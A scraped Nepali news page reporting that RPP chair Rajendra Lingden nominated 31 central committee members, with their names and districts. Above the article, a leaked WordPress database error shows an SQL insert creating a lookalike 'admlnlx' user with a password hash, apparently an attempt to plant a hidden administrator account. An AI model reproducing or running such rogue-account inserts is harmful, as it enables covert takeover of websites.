WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Br.wHg.nZHQ1oQAJlqDZcYMwHOj.y..', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 05:53:58', '', 'admlnlx', 'admlnlx')

लिङ्देनले सोलुखुम्बुका एजि शेर्पा सहित ३१ जना केन्द्रिय सदस्यमा मनोनित – Gaule Khabar

लिङ्देनले सोलुखुम्बुका एजि शेर्पा सहित ३१ जना केन्द्रिय सदस्यमा मनोनित

लिङ्देनले सोलुखुम्बुका एजि शेर्पा सहित ३१ जना केन्द्रिय सदस्यमा मनोनित

काठमाण्डौ । राष्ट्रिय प्रजातन्त्र पार्टीका अध्यक्ष राजेन्द्र लिङ्देनले सोलुखुम्बुका एजी शेर्पा सहित ३१ जनालाई केन्द्रीय सदस्यमा मनोनयन गरेका छन् । पार्टीको विधान बमोजिम उनीहरुलाई केन्द्रीय कार्य समितिको सदस्य पदमा मनोनयन गरेको लिङ्देनको भनाइ छ ।

केन्द्रीय सदस्यमाको नामावली
१) एजी शेर्पा, सोलुखुम्बु
२) हरिबहादुर बस्नेत, उदयपुर
३) नवराज सुवेदी, रामेछाप
४) बालाराम घर्ती मगर, रोल्पा
५) टंक ढकाल, भोजपुर
६) प्रेम बहादुर भण्डारी, बाँके
७) निरञ्जन थापा, रुपन्देही
८) भिमप्रसाद गौचन, म्याग्दी
९) हेमजंग गुरुङ, लमजुङ
१०) ठाकुर प्रसाद शर्मा, धादिङ
११)रामकुमार सुब्बा, सुनसरी
१२) मुकुन्दश्याम गिरी, सुर्खेत
१३) दिनेश श्रेष्ठ, भक्तपुर
१४) प्रा.डा.गीताभक्त जोशी, काठमाडौं
१५) भक्ति प्रसाद सिटौला, झापा
१६)मोहन कुमार श्रेष्ठ, गोरखा
१७)झनक प्याकुरेल, नुवाकोट
१८)श्यामबहादुर शाही, अछाम
१९) दिपक बोहरा, रुपन्देही
२०)पुष्पराज पुरुष, ललितपुर
२१) रमानन्द न्यौपाने, जुम्ला
२२)सरोजा शर्मा, नवलपरासी
२३) रामप्रताप साह भोला, सिराहा
२४) रविन चाम्लिङ, खोटाङ
२५) उदयराज पोखरेल, स्याङ्जा
२६) सरस्वती के।सी।अधिकारी, काठमाडौं
२७) दिनेश कार्की, रामेछाप
२८)वीरेन्द्र बम, कैलाली
२९)केशवचन्द्र समाल, रुकुम पूर्व
३०)अम्बर बहादुर विष्ट, झापा
३१)नवीन शाही, काठमाडौं

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका